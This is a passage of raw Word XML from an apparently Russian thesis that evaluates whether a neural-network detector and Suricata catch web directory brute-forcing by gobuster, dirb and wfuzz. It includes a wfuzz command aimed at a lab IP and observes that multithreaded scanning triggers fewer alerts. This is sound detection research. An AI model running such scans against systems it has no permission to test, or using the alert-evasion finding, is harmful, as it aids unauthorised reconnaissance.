          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 50  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C1D03" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721C2DD7" w14:textId="06B21829"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Процесс обнаружения показан на рисунке 3</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1784B8" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F3371A" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274B6B2D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1469099E" wp14:editId="2539FC32">
            <wp:extent cx="6141208" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1123469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69734" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6160403" cy="2560679"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="623EF4C5" w14:textId="64ACC5DE" w:rsidR="0099286E" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Обнаружение м</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8684F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ногопоточн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ого </w:t>
      </w:r>
      <w:r w:rsidRPr="00F8684F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>перебор</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8684F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> директорий</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCFBE73" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="001F50D6" w:rsidRDefault="009534A2" w:rsidP="000A1CD6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327791F8"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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ногопоточный режим </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> сгенерировал меньшее число </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> по сравнению с последовательным сканированием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это объясняется особенностью архитектуры нейросетевой модели — при параллельном сканировании каждый поток создаёт короткую независимую TCP-сессию с относительно нормальными характеристиками, тогда как последовательный перебор </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> формирует длинные сессии с аномально высоким значением признака интенсивности пакетов и асимметрии потока, которые модель классифицирует как более явную аномалию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3027B368"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F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Третьим инструментом выступил </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — многофункциональный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>фаззер</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> веб-приложений, позволяющий выполнять перебор директорий с гибкой настройкой параметров запроса:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1DFDA6" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1A6E3A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00A10D48" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common.txt \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570391EB" w14:textId="63E79C56" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 404 \ </w:t>
      </w:r>
      <w:r w:rsidR="009534A2" w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="009534A2" w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>://192.168.0.104/</w:t>
      </w:r>
      <w:r w:rsidR="009534A2" w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC42934" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="009534A2" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410D6DBD" w14:textId="1B517BB7" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="0099286E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Флаг --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3371A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 404 исключает из вывода страницы с кодом 404, оставляя только существующие директории.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8684F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процесс обнаружения показан на рисунке 3</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BAB939" w14:textId="77777777" w:rsidR="005C39E4" w:rsidRDefault="005C39E4" w:rsidP="0099286E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B37B9F6" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F3371A" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2591A1C2" wp14:editId="6C89BF7D">
            <wp:extent cx="5761105" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="890112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12021" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5765669" cy="2726308"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5E516" w14:textId="4CAEA41B" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ф</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8684F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>аззинг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F8684F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> веб-директорий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05926B37" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F3371A" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D27D7DF"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9F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">частично обнаружила активность перебора директорий. Инструменты </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F7C39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
